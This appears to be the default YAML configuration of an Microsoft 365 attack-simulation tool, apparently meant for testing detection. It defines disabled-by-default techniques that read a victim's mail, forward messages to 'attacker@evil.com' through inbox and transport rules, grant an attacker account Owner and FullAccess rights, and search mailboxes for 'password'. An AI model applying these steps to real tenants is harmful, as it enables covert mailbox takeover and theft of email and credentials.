-
Notifications
You must be signed in to change notification settings - Fork 7
/
default-config.yml
74 lines (63 loc) · 1.89 KB
/
default-config.yml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
authentication:
tenant_id: "your-tenant-id"
#Used for service principal authentication
application_id : "client-app-id"
client_secret : "s3cret"
# Used for user authentication
username: "victim@victim.com"
password: "s3cret"
techniques:
- technique: "read_email"
enabled: False
parameters:
auth_method : resource_owner
access_method: "graph"
mailbox: "victim@victim.com"
limit : 5
- technique: "create_rule"
enabled: False
parameters:
auth_method : resource_owner
access_method: "graph"
mailbox: "victim@victim.com"
rule_name : "msinvader rule 33"
forward_to : "attacker@evil.com"
body_contains : "invoice"
- technique: "enable_email_forwarding"
enabled: False
parameters:
auth_method : resource_owner
access_method: "rest"
mailbox: "victim@victim.com"
forward_to : "attacker@evil.com"
- technique: "add_folder_permission"
enabled: False
parameters:
auth_method : resource_owner
access_method: "rest"
mailbox : "victim@victim.com"
folder: "Inbox"
grantee : "Default"
access_rights : "Owner"
- technique: "add_mailbox_delegation"
enabled: False
parameters:
auth_method : resource_owner
access_method: "rest"
mailbox: "victim@victim.com"
grantee : "attacker@victim.com"
access_rights : "FullAccess"
- technique: "run_compliance_search"
enabled: False
parameters:
auth_method : resource_owner
access_method: "rest"
keyword : "password"
name : "msInvader 365 compliance search"
- technique: "create_mailfow_rule"
enabled: False
parameters:
auth_method : resource_owner
access_method: "rest"
forward_to : "attacker@evil.com"
name : "msInvader mailfow rule"